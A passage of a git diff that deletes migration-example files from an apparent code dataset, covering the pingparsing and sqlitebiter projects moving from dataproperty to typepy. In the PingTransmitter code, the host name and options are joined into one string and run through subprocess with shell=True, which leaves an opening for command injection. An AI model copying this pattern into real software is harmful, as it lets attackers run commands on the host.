- rtt_pattern = ( - pp.Literal("rtt min/avg/max/mdev =") + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + - pp.Word(pp.nums + "ms") - ) - try: - parse_list = rtt_pattern.parseString(_to_unicode(rtt_line)) - except pp.ParseBaseException: - return - - self.__rtt_min = float(parse_list[1]) - self.__rtt_avg = float(parse_list[3]) - self.__rtt_max = float(parse_list[5]) - self.__rtt_mdev = float(parse_list[7]) - - def __initialize_parse_result(self): - self.__packet_transmit = None - self.__packet_receive = None - self.__packet_loss = None - self.__rtt_min = None - self.__rtt_avg = None - self.__rtt_max = None - self.__rtt_mdev = None diff --git a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.target.py b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.target.py deleted file mode 100644 index af3d0c5..0000000 --- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.target.py +++ /dev/null @@ -1,262 +0,0 @@ -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import - -import re - -import typepy -import pyparsing as pp - -from .error import EmptyPingStaticticsError -from .error import PingStaticticsHeaderNotFoundError - - -def _to_unicode(text): - try: - return text.decode("ascii") - except AttributeError: - return text - - -class PingParsing(object): - """ - Parser class to parsing ping command output. - """ - - def __init__(self): - self.destination_host = "" - self.ping_option = "" - - self.__initialize_parse_result() - - @property - def packet_transmit(self): - """ - :return: Number of packets transmitted. - :rtype: int - """ - - return self.__packet_transmit - - @property - def packet_receive(self): - """ - :return: Number of packets received. - :rtype: int - """ - - return self.__packet_receive - - @property - def packet_loss(self): - """ - :return: Percentage of packet loss [%]. - :rtype: float - """ - - return self.__packet_loss - - @property - def rtt_min(self): - """ - :return: Minimum round trip time of transmitted ICMP packets [ms]. - :rtype: float - """ - - return self.__rtt_min - - @property - def rtt_avg(self): - """ - :return: Average round trip time of transmitted ICMP packets [ms]. - :rtype: float - """ - - return self.__rtt_avg - - @property - def rtt_max(self): - """ - :return: Maximum round trip time of transmitted ICMP packets [ms]. - :rtype: float - """ - - return self.__rtt_max - - @property - def rtt_mdev(self): - """ - :return: Standard deviation of transmitted ICMP packets (Linux only). - :rtype: float - """ - - return self.__rtt_mdev - - def as_dict(self): - """ - :return: Parsed result as a dictionary. - :rtype: dict - """ - - return { - "packet_transmit": self.packet_transmit, - "packet_receive": self.packet_receive, - "packet_loss": self.packet_loss, - "rtt_min": self.rtt_min, - "rtt_avg": self.rtt_avg, - "rtt_max": self.rtt_max, - "rtt_mdev": self.rtt_mdev, - } - - def parse(self, ping_message): - """ - Parse ping command output. - You can get parsing results by attributes: - - - :py:attr:`.packet_transmit` - - :py:attr:`.packet_receive` - - :py:attr:`.packet_loss` - - :py:attr:`.rtt_min` - - :py:attr:`.rtt_avg` - - :py:attr:`.rtt_max` - - :py:attr:`.rtt_mdev` - - Or you can get as a dictionary by :py:meth:`.as_dict` - - :param str ping_message: String of ping command output. - """ - - self.__initialize_parse_result() - - if typepy.is_null_string(ping_message): - return - - try: - self.__parse_linux_ping(ping_message) - return - except PingStaticticsHeaderNotFoundError: - pass - - self.__parse_windows_ping(ping_message) - - def __find_ststs_head_line_idx(self, line_list, re_stats_header): - for i, line in enumerate(line_list): - if re_stats_header.search(line): - break - else: - raise PingStaticticsHeaderNotFoundError( - "ping statistics not found") - - return i - - def __validate_stats_body(self, body_line_list): - if typepy.is_empty_sequence(body_line_list): - raise EmptyPingStaticticsError("ping statistics is empty") - - def __parse_windows_ping(self, ping_message): - line_list = _to_unicode(ping_message).splitlines() - - i = self.__find_ststs_head_line_idx( - line_list, re.compile("^Ping statistics for ")) - - body_line_list = line_list[i + 1:] - self.__validate_stats_body(body_line_list) - packet_line = body_line_list[0].strip() - packet_pattern = ( - pp.Literal("Packets: Sent = ") + - pp.Word(pp.nums) + - pp.Literal(", Received = ") + - pp.Word(pp.nums) + - pp.Literal(", Lost = ") + - pp.Word(pp.nums) + "(" + - pp.Word(pp.nums + ".") - ) - parse_list = packet_pattern.parseString(_to_unicode(packet_line)) - self.__packet_transmit = int(parse_list[1]) - self.__packet_receive = int(parse_list[3]) - self.__packet_loss = float(parse_list[7]) - - try: - rtt_line = body_line_list[2].strip() - except IndexError: - return - if typepy.is_null_string(rtt_line): - return - rtt_pattern = ( - pp.Literal("Minimum = ") + - pp.Word(pp.nums) + - pp.Literal("ms, Maximum = ") + - pp.Word(pp.nums) + - pp.Literal("ms, Average = ") + - pp.Word(pp.nums) - ) - try: - parse_list = rtt_pattern.parseString(_to_unicode(rtt_line)) - except pp.ParseBaseException: - return - - self.__rtt_min = float(parse_list[1]) - self.__rtt_avg = float(parse_list[5]) - self.__rtt_max = float(parse_list[3]) - - def __parse_linux_ping(self, ping_message): - line_list = _to_unicode(ping_message).splitlines() - - i = self.__find_ststs_head_line_idx( - line_list, re.compile("--- .* ping statistics ---")) - - body_line_list = line_list[i + 1:] - self.__validate_stats_body(body_line_list) - - packet_line = body_line_list[0] - packet_pattern = ( - pp.Word(pp.nums) + - pp.Literal("packets transmitted,") + - pp.Word(pp.nums) + - pp.Literal("received,") + - pp.SkipTo(pp.Word(pp.nums + ".%") + pp.Literal("packet loss")) + - pp.Word(pp.nums + ".") + - pp.Literal("% packet loss") - ) - parse_list = packet_pattern.parseString(_to_unicode(packet_line)) - self.__packet_transmit = int(parse_list[0]) - self.__packet_receive = int(parse_list[2]) - self.__packet_loss = float(parse_list[-2]) - - try: - rtt_line = body_line_list[1] - except IndexError: - return - if typepy.is_null_string(rtt_line): - return - - rtt_pattern = ( - pp.Literal("rtt min/avg/max/mdev =") + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + "/" + - pp.Word(pp.nums + ".") + - pp.Word(pp.nums + "ms") - ) - try: - parse_list = rtt_pattern.parseString(_to_unicode(rtt_line)) - except pp.ParseBaseException: - return - - self.__rtt_min = float(parse_list[1]) - self.__rtt_avg = float(parse_list[3]) - self.__rtt_max = float(parse_list[5]) - self.__rtt_mdev = float(parse_list[7]) - - def __initialize_parse_result(self): - self.__packet_transmit = None - self.__packet_receive = None - self.__packet_loss = None - self.__rtt_min = None - self.__rtt_avg = None - self.__rtt_max = None - self.__rtt_mdev = None diff --git a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.diff b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.diff deleted file mode 100644 index 4d81f8c..0000000 --- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.diff +++ /dev/null @@ -1,80 +0,0 @@ -diff --git a/pingparsing/_pingtransmitter.py b/pingparsing/_pingtransmitter.py - index 0b98aff8724ef994311f48b983bd411344463e4c..45fac3cb38661f80fc8bd129ce633cfd15423835 100644 - --- a/pingparsing/_pingtransmitter.py - +++ b/pingparsing/_pingtransmitter.py -@@ -8,7 +8,8 @@ from __future__ import absolute_import - from collections import namedtuple - import platform - --import dataproperty as dp -+import typepy -+from typepy.type import Integer - - - class PingResult(namedtuple("PingResult", "stdout stderr returncode")): -@@ -83,7 +84,7 @@ class PingTransmitter(object): - - command_list = self.__get_base_ping_command() - -- if dp.is_not_empty_string(self.ping_option): -+ if typepy.is_not_null_string(self.ping_option): - command_list.append(self.ping_option) - - command_list.append(self.__get_waittime_option()) -@@ -97,7 +98,7 @@ class PingTransmitter(object): - return PingResult(stdout, stderr, ping_proc.returncode) - - def __validate_ping_param(self): -- if dp.is_empty_string(self.destination_host): -+ if typepy.is_null_string(self.destination_host): - raise ValueError("required destination_host") - - self.__validate_waittime() -@@ -107,8 +108,9 @@ class PingTransmitter(object): - if self.waittime is None: - return - -- waittime = dp.IntegerType(self.waittime).try_convert() -- if waittime is None: -+ try: -+ waittime = Integer(self.waittime).convert() -+ except typepy.TypeConversionError: - raise ValueError("wait time must be an integer: actual={}".format( - self.waittime)) - -@@ -119,8 +121,9 @@ class PingTransmitter(object): - if self.count is None: - return - -- count = dp.IntegerType(self.count).try_convert() -- if count is None: -+ try: -+ count = Integer(self.count).convert() -+ except typepy.TypeConversionError: - raise ValueError("count must be an integer: actual={}".format( - self.count)) - -@@ -141,8 +144,9 @@ class PingTransmitter(object): - return command_list - - def __get_waittime_option(self): -- waittime = dp.IntegerType(self.waittime).try_convert() -- if waittime is None: -+ try: -+ waittime = Integer(self.waittime).convert() -+ except typepy.TypeConversionError: - return "" - - if platform.system() == "Windows": -@@ -151,8 +155,9 @@ class PingTransmitter(object): - return "-q -w {:d}".format(waittime) - - def __get_count_option(self): -- count = dp.IntegerType(self.count).try_convert() -- if count is None: -+ try: -+ count = Integer(self.count).convert() -+ except typepy.TypeConversionError: - return "" - - if platform.system() == "Windows": diff --git a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.source.py b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.source.py deleted file mode 100644 index 112a80b..0000000 --- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.source.py +++ /dev/null @@ -1,161 +0,0 @@ -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import -from collections import namedtuple -import platform - -import dataproperty as dp - - -class PingResult(namedtuple("PingResult", "stdout stderr returncode")): - """ - Data class to store ``ping`` command execution result. - - .. py:attribute:: stdout - - Standard output of ``ping`` command execution result. - - .. py:attribute:: stderr - - Standard error of ``ping`` command execution result. - - .. py:attribute:: returncode - - Return code of ``ping`` command execution result. - """ - - -class PingTransmitter(object): - """ - Transmitter class to send ICMP packets by using the OS built-in ``ping`` - command. - - .. py:attribute:: destination_host - - Hostname/IP-address to sending ICMP packets. - - .. py:attribute:: waittime - - Time [sec] for sending packets. - If the value is ``None``, sending packets time will be the same as - built-in ``ping`` command. - Defaults to 1 [sec]. - - .. py:attribute:: count - - Number of sending ICMP packets. - The value will be ignored if the value is ``None``. - Defaults to ``None``. - - .. py:attribute:: ping_option - - Additional ``ping`` command option. - - .. py:attribute:: auto_codepage - - [Only for windows environment] Automatically change code page if - ``True``. Defaults to ``True``. - """ - - def __init__(self): - self.destination_host = "" - self.waittime = 1 - self.count = None - self.ping_option = "" - self.auto_codepage = True - - def ping(self): - """ - Sending ICMP packets. - - :return: ``ping`` command execution result. - :rtype: :py:class:`.PingResult` - :raises ValueError: If parameters not valid. - """ - - import subprocess - - self.__validate_ping_param() - - command_list = self.__get_base_ping_command() - - if dp.is_not_empty_string(self.ping_option): - command_list.append(self.ping_option) - - command_list.append(self.__get_waittime_option()) - command_list.append(self.__get_count_option()) - - ping_proc = subprocess.Popen( - " ".join(command_list), shell=True, - stdout=subprocess.PIPE, stderr=subprocess.PIPE) - stdout, stderr = ping_proc.communicate() - - return PingResult(stdout, stderr, ping_proc.returncode) - - def __validate_ping_param(self): - if dp.is_empty_string(self.destination_host): - raise ValueError("required destination_host") - - self.__validate_waittime() - self.__validate_count() - - def __validate_waittime(self): - if self.waittime is None: - return - - waittime = dp.IntegerType(self.waittime).try_convert() - if waittime is None: - raise ValueError("wait time must be an integer: actual={}".format( - self.waittime)) - - if waittime <= 0: - raise ValueError("wait time must be greater than zero") - - def __validate_count(self): - if self.count is None: - return - - count = dp.IntegerType(self.count).try_convert() - if count is None: - raise ValueError("count must be an integer: actual={}".format( - self.count)) - - if count <= 0: - raise ValueError("count must be greater than zero") - - def __get_base_ping_command(self): - command_list = [] - - if platform.system() == "Windows" and self.auto_codepage: - command_list.append("chcp 437 &") - - command_list.extend([ - "ping", - self.destination_host, - ]) - - return command_list - - def __get_waittime_option(self): - waittime = dp.IntegerType(self.waittime).try_convert() - if waittime is None: - return "" - - if platform.system() == "Windows": - return "-n {:d}".format(waittime) - else: - return "-q -w {:d}".format(waittime) - - def __get_count_option(self): - count = dp.IntegerType(self.count).try_convert() - if count is None: - return "" - - if platform.system() == "Windows": - return "-n {:d}".format(count) - else: - return "-c {:d}".format(count) diff --git a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.target.py b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.target.py deleted file mode 100644 index e723029..0000000 --- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.target.py +++ /dev/null @@ -1,166 +0,0 @@ -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import -from collections import namedtuple -import platform - -import typepy -from typepy.type import Integer - - -class PingResult(namedtuple("PingResult", "stdout stderr returncode")): - """ - Data class to store ``ping`` command execution result. - - .. py:attribute:: stdout - - Standard output of ``ping`` command execution result. - - .. py:attribute:: stderr - - Standard error of ``ping`` command execution result. - - .. py:attribute:: returncode - - Return code of ``ping`` command execution result. - """ - - -class PingTransmitter(object): - """ - Transmitter class to send ICMP packets by using the OS built-in ``ping`` - command. - - .. py:attribute:: destination_host - - Hostname/IP-address to sending ICMP packets. - - .. py:attribute:: waittime - - Time [sec] for sending packets. - If the value is ``None``, sending packets time will be the same as - built-in ``ping`` command. - Defaults to 1 [sec]. - - .. py:attribute:: count - - Number of sending ICMP packets. - The value will be ignored if the value is ``None``. - Defaults to ``None``. - - .. py:attribute:: ping_option - - Additional ``ping`` command option. - - .. py:attribute:: auto_codepage - - [Only for windows environment] Automatically change code page if - ``True``. Defaults to ``True``. - """ - - def __init__(self): - self.destination_host = "" - self.waittime = 1 - self.count = None - self.ping_option = "" - self.auto_codepage = True - - def ping(self): - """ - Sending ICMP packets. - - :return: ``ping`` command execution result. - :rtype: :py:class:`.PingResult` - :raises ValueError: If parameters not valid. - """ - - import subprocess - - self.__validate_ping_param() - - command_list = self.__get_base_ping_command() - - if typepy.is_not_null_string(self.ping_option): - command_list.append(self.ping_option) - - command_list.append(self.__get_waittime_option()) - command_list.append(self.__get_count_option()) - - ping_proc = subprocess.Popen( - " ".join(command_list), shell=True, - stdout=subprocess.PIPE, stderr=subprocess.PIPE) - stdout, stderr = ping_proc.communicate() - - return PingResult(stdout, stderr, ping_proc.returncode) - - def __validate_ping_param(self): - if typepy.is_null_string(self.destination_host): - raise ValueError("required destination_host") - - self.__validate_waittime() - self.__validate_count() - - def __validate_waittime(self): - if self.waittime is None: - return - - try: - waittime = Integer(self.waittime).convert() - except typepy.TypeConversionError: - raise ValueError("wait time must be an integer: actual={}".format( - self.waittime)) - - if waittime <= 0: - raise ValueError("wait time must be greater than zero") - - def __validate_count(self): - if self.count is None: - return - - try: - count = Integer(self.count).convert() - except typepy.TypeConversionError: - raise ValueError("count must be an integer: actual={}".format( - self.count)) - - if count <= 0: - raise ValueError("count must be greater than zero") - - def __get_base_ping_command(self): - command_list = [] - - if platform.system() == "Windows" and self.auto_codepage: - command_list.append("chcp 437 &") - - command_list.extend([ - "ping", - self.destination_host, - ]) - - return command_list - - def __get_waittime_option(self): - try: - waittime = Integer(self.waittime).convert() - except typepy.TypeConversionError: - return "" - - if platform.system() == "Windows": - return "-n {:d}".format(waittime) - else: - return "-q -w {:d}".format(waittime) - - def __get_count_option(self): - try: - count = Integer(self.count).convert() - except typepy.TypeConversionError: - return "" - - if platform.system() == "Windows": - return "-n {:d}".format(count) - else: - return "-c {:d}".format(count) diff --git a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.diff b/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.diff deleted file mode 100644 index 8a7cc83..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.diff +++ /dev/null @@ -1,53 +0,0 @@ -diff --git a/sqlitebiter/sqlitebiter.py b/sqlitebiter/sqlitebiter.py - index 462720ea03ad59e8288ba75d634caa3e23d54c79..26c8e7467fb764d6abca03d6830f7679cbfc3ea1 100644 - --- a/sqlitebiter/sqlitebiter.py - +++ b/sqlitebiter/sqlitebiter.py -@@ -10,11 +10,11 @@ from __future__ import absolute_import - import sys - - import click --import dataproperty - import logbook - import path - import simplesqlite - from sqliteschema import SqliteSchemaExtractor -+import typepy - - import pytablereader as ptr - -@@ -43,7 +43,7 @@ def create_database(ctx, database_path): - - db_path = path.Path(database_path) - dir_path = db_path.dirname() -- if dataproperty.is_not_empty_string(dir_path): -+ if typepy.is_not_null_string(dir_path): - dir_path.makedirs_p() - - if is_append_table: -@@ -133,7 +133,7 @@ def file(ctx, files, output_path): - to a SQLite database file. - """ - -- if dataproperty.is_empty_sequence(files): -+ if typepy.is_empty_sequence(files): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) -@@ -224,7 +224,7 @@ def url(ctx, url, format_name, output_path, encoding, proxy): - Scrape tabular data from a URL and convert data to a SQLite database file. - """ - -- if dataproperty.is_empty_sequence(url): -+ if typepy.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) -@@ -236,7 +236,7 @@ def url(ctx, url, format_name, output_path, encoding, proxy): - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - proxies = {} -- if dataproperty.is_not_empty_string(proxy): -+ if typepy.is_not_null_string(proxy): - proxies = { - "http": proxy, - "https": proxy, diff --git a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.source.py b/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.source.py deleted file mode 100644 index 41f225e..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.source.py +++ /dev/null @@ -1,341 +0,0 @@ -#!/usr/bin/env python -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import - -import sys - -import click -import dataproperty -import logbook -import path -import simplesqlite -from sqliteschema import SqliteSchemaExtractor - -import pytablereader as ptr - -from ._counter import ResultCounter -from ._enum import ( - Context, - ExitCode, -) -from ._version import VERSION - - -CONTEXT_SETTINGS = dict( - help_option_names=["-h", "--help"], - obj={}, -) -MAX_VERBOSITY_LEVEL = 2 -QUIET_LOG_LEVEL = logbook.NOTSET - -logbook.StderrHandler( - level=logbook.DEBUG, - format_string='[{record.level_name}] {record.message}').push_application() - - -def create_database(ctx, database_path): - is_append_table = ctx.obj.get(Context.IS_APPEND_TABLE) - - db_path = path.Path(database_path) - dir_path = db_path.dirname() - if dataproperty.is_not_empty_string(dir_path): - dir_path.makedirs_p() - - if is_append_table: - return simplesqlite.SimpleSQLite(db_path, "a") - else: - return simplesqlite.SimpleSQLite(db_path, "w") - - -def write_completion_message(logger, database_path, result_counter): - logger.debug(u"----- sqlitebiter completed -----") - logger.debug(u"database path: {:s}".format(database_path)) - logger.debug(u"number of created table: {:d}".format( - result_counter.success_count)) - logger.debug(u"") - - logger.debug(u"----- database schema -----") - logger.debug( - get_schema_extractor(database_path, MAX_VERBOSITY_LEVEL).dumps()) - - -def _setup_logger(logger, log_level): - ptr.set_log_level(log_level) - simplesqlite.set_log_level(log_level) - - if log_level == QUIET_LOG_LEVEL: - logger.disable() - - logger.level = log_level - - -def _get_format_type_from_path(file_path): - return file_path.ext.lstrip(".") - - -@click.group(context_settings=CONTEXT_SETTINGS) -@click.version_option(version=VERSION) -@click.option( - "--append", "is_append_table", is_flag=True, - help="append table(s) to existing database.") -@click.option("-v", "--verbose", "verbosity_level", count=True) -@click.option( - "--debug", "log_level", flag_value=logbook.DEBUG, - help="for debug print.") -@click.option( - "--quiet", "log_level", flag_value=QUIET_LOG_LEVEL, - help="suppress execution log messages.") -@click.pass_context -def cmd(ctx, is_append_table, verbosity_level, log_level): - ctx.obj[Context.IS_APPEND_TABLE] = is_append_table - ctx.obj[Context.VERBOSITY_LEVEL] = verbosity_level - ctx.obj[Context.LOG_LEVEL] = ( - logbook.INFO if log_level is None else log_level) - - -def get_schema_extractor(source, verbosity_level): - if verbosity_level >= MAX_VERBOSITY_LEVEL: - return SqliteSchemaExtractor( - source, verbosity_level=0, output_format="table") - - if verbosity_level >= 1: - return SqliteSchemaExtractor( - source, verbosity_level=3, output_format="text") - - if verbosity_level == 0: - return SqliteSchemaExtractor( - source, verbosity_level=0, output_format="text") - - raise ValueError("invalid verbosity_level: {}".format(verbosity_level)) - - -def get_success_log_format(verbosity_level): - if verbosity_level <= 1: - return u"convert '{:s}' to '{:s}' table" - - return u"convert '{:s}' to {:s}" - - -@cmd.command() -@click.argument("files", type=str, nargs=-1) -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="Output path of the SQLite database file") -@click.pass_context -def file(ctx, files, output_path): - """ - Convert tabular data within CSV/Excel/HTML/JSON/LTSV/Markdown/TSV file(s) - to a SQLite database file. - """ - - if dataproperty.is_empty_sequence(files): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) - verbosity_level = ctx.obj.get(Context.VERBOSITY_LEVEL) - extractor = get_schema_extractor(con, verbosity_level) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter file") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - for file_path in files: - file_path = path.Path(file_path) - if not file_path.isfile(): - logger.debug(u"file not found: {}".format(file_path)) - result_counter.inc_fail() - continue - - logger.debug(u"converting '{}'".format(file_path)) - - try: - loader = ptr.TableFileLoader(file_path) - except ptr.InvalidFilePathError as e: - logger.debug(e) - result_counter.inc_fail() - continue - except ptr.LoaderNotFoundError: - logger.debug( - u"loader not found that coincide with '{}'".format(file_path)) - result_counter.inc_fail() - continue - - try: - for tabledata in loader.load(): - sqlite_tabledata = ptr.SQLiteTableDataSanitizer( - tabledata).sanitize() - - try: - con.create_table_from_tabledata(sqlite_tabledata) - result_counter.inc_success() - except (ValueError, IOError) as e: - logger.debug( - u"path={}, message={}".format(file_path, e)) - result_counter.inc_fail() - continue - - log_message = get_success_log_format(verbosity_level).format( - file_path, - extractor.get_table_schema_text(sqlite_tabledata.table_name).strip()) - logger.info(log_message) - except ptr.OpenError as e: - logger.error(u"open error: file={}, message='{}'".format( - file_path, str(e))) - result_counter.inc_fail() - except ptr.ValidationError as e: - logger.error( - u"invalid {} data format: path={}, message={}".format( - _get_format_type_from_path(file_path), file_path, str(e))) - result_counter.inc_fail() - except ptr.InvalidDataError as e: - logger.error( - u"invalid {} data: path={}, message={}".format( - _get_format_type_from_path(file_path), file_path, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - -@cmd.command() -@click.argument("url", type=str) -@click.option( - "--format", "format_name", - type=click.Choice(ptr.TableUrlLoader.get_format_name_list()), - help="Data format to loading (defaults to html).") -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="Output path of the SQLite database file.") -@click.option( - "--encoding", type=str, metavar="ENCODING", default="utf-8", - help="Defaults to utf-8") -@click.option( - "--proxy", type=str, metavar="PROXY", - help="Specify a proxy in the form [user:passwd@]proxy.server:port.") -@click.pass_context -def url(ctx, url, format_name, output_path, encoding, proxy): - """ - Scrape tabular data from a URL and convert data to a SQLite database file. - """ - - if dataproperty.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) - verbosity_level = ctx.obj.get(Context.VERBOSITY_LEVEL) - extractor = get_schema_extractor(con, verbosity_level) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter url") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - proxies = {} - if dataproperty.is_not_empty_string(proxy): - proxies = { - "http": proxy, - "https": proxy, - } - - try: - loader = ptr.TableUrlLoader( - url, format_name, encoding=encoding, proxies=proxies) - except ptr.LoaderNotFoundError as e: - try: - loader = ptr.TableUrlLoader( - url, "html", encoding=encoding, proxies=proxies) - except (ptr.LoaderNotFoundError, ptr.HTTPError): - logger.error(e) - sys.exit(ExitCode.FAILED_LOADER_NOT_FOUND) - except ptr.HTTPError as e: - logger.error(e) - sys.exit(ExitCode.FAILED_HTTP) - - try: - for tabledata in loader.load(): - sqlite_tabledata = ptr.SQLiteTableDataSanitizer( - tabledata).sanitize() - - try: - con.create_table_from_tabledata(sqlite_tabledata) - result_counter.inc_success() - except (ValueError) as e: - logger.debug( - u"url={}, message={}".format(url, str(e))) - result_counter.inc_fail() - continue - - log_message = get_success_log_format(verbosity_level).format( - url, - extractor.get_table_schema_text(sqlite_tabledata.table_name).strip()) - logger.info(log_message) - except ptr.InvalidDataError as e: - logger.error(u"invalid data: url={}, message={}".format(url, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - -@cmd.command() -@click.argument( - "credentials", type=click.Path(exists=True)) -@click.argument( - "title", type=str) -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="output path of the SQLite database file") -@click.pass_context -def gs(ctx, credentials, title, output_path): - """ - Convert a spreadsheet in Google Sheets to a SQLite database file. - - CREDENTIALS: OAuth2 Google credentials file. - TITLE: Title of the Google Sheets to convert. - """ - - con = create_database(ctx, output_path) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter gs") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - loader = simplesqlite.loader.GoogleSheetsTableLoader() - loader.source = credentials - loader.title = title - - try: - for tabledata in loader.load(): - click.echo(u"convert '{:s}' to '{:s}' table".format( - title, tabledata.table_name)) - - try: - con.create_table_from_tabledata(tabledata) - result_counter.inc_success() - except (ptr.ValidationError, ptr.InvalidDataError): - result_counter.inc_fail() - except ptr.OpenError as e: - logger.error(e) - result_counter.inc_fail() - except AttributeError: - logger.error(u"invalid credentials data: path={}".format(credentials)) - result_counter.inc_fail() - except (ptr.ValidationError, ptr.InvalidDataError) as e: - logger.error( - u"invalid credentials data: path={}, message={}".format( - credentials, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - -if __name__ == '__main__': - cmd() diff --git a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.target.py b/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.target.py deleted file mode 100644 index 9a3e3e4..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.target.py +++ /dev/null @@ -1,341 +0,0 @@ -#!/usr/bin/env python -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import - -import sys - -import click -import logbook -import path -import simplesqlite -from sqliteschema import SqliteSchemaExtractor -import typepy - -import pytablereader as ptr - -from ._counter import ResultCounter -from ._enum import ( - Context, - ExitCode, -) -from ._version import VERSION - - -CONTEXT_SETTINGS = dict( - help_option_names=["-h", "--help"], - obj={}, -) -MAX_VERBOSITY_LEVEL = 2 -QUIET_LOG_LEVEL = logbook.NOTSET - -logbook.StderrHandler( - level=logbook.DEBUG, - format_string='[{record.level_name}] {record.message}').push_application() - - -def create_database(ctx, database_path): - is_append_table = ctx.obj.get(Context.IS_APPEND_TABLE) - - db_path = path.Path(database_path) - dir_path = db_path.dirname() - if typepy.is_not_null_string(dir_path): - dir_path.makedirs_p() - - if is_append_table: - return simplesqlite.SimpleSQLite(db_path, "a") - else: - return simplesqlite.SimpleSQLite(db_path, "w") - - -def write_completion_message(logger, database_path, result_counter): - logger.debug(u"----- sqlitebiter completed -----") - logger.debug(u"database path: {:s}".format(database_path)) - logger.debug(u"number of created table: {:d}".format( - result_counter.success_count)) - logger.debug(u"") - - logger.debug(u"----- database schema -----") - logger.debug( - get_schema_extractor(database_path, MAX_VERBOSITY_LEVEL).dumps()) - - -def _setup_logger(logger, log_level): - ptr.set_log_level(log_level) - simplesqlite.set_log_level(log_level) - - if log_level == QUIET_LOG_LEVEL: - logger.disable() - - logger.level = log_level - - -def _get_format_type_from_path(file_path): - return file_path.ext.lstrip(".") - - -@click.group(context_settings=CONTEXT_SETTINGS) -@click.version_option(version=VERSION) -@click.option( - "--append", "is_append_table", is_flag=True, - help="append table(s) to existing database.") -@click.option("-v", "--verbose", "verbosity_level", count=True) -@click.option( - "--debug", "log_level", flag_value=logbook.DEBUG, - help="for debug print.") -@click.option( - "--quiet", "log_level", flag_value=QUIET_LOG_LEVEL, - help="suppress execution log messages.") -@click.pass_context -def cmd(ctx, is_append_table, verbosity_level, log_level): - ctx.obj[Context.IS_APPEND_TABLE] = is_append_table - ctx.obj[Context.VERBOSITY_LEVEL] = verbosity_level - ctx.obj[Context.LOG_LEVEL] = ( - logbook.INFO if log_level is None else log_level) - - -def get_schema_extractor(source, verbosity_level): - if verbosity_level >= MAX_VERBOSITY_LEVEL: - return SqliteSchemaExtractor( - source, verbosity_level=0, output_format="table") - - if verbosity_level >= 1: - return SqliteSchemaExtractor( - source, verbosity_level=3, output_format="text") - - if verbosity_level == 0: - return SqliteSchemaExtractor( - source, verbosity_level=0, output_format="text") - - raise ValueError("invalid verbosity_level: {}".format(verbosity_level)) - - -def get_success_log_format(verbosity_level): - if verbosity_level <= 1: - return u"convert '{:s}' to '{:s}' table" - - return u"convert '{:s}' to {:s}" - - -@cmd.command() -@click.argument("files", type=str, nargs=-1) -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="Output path of the SQLite database file") -@click.pass_context -def file(ctx, files, output_path): - """ - Convert tabular data within CSV/Excel/HTML/JSON/LTSV/Markdown/TSV file(s) - to a SQLite database file. - """ - - if 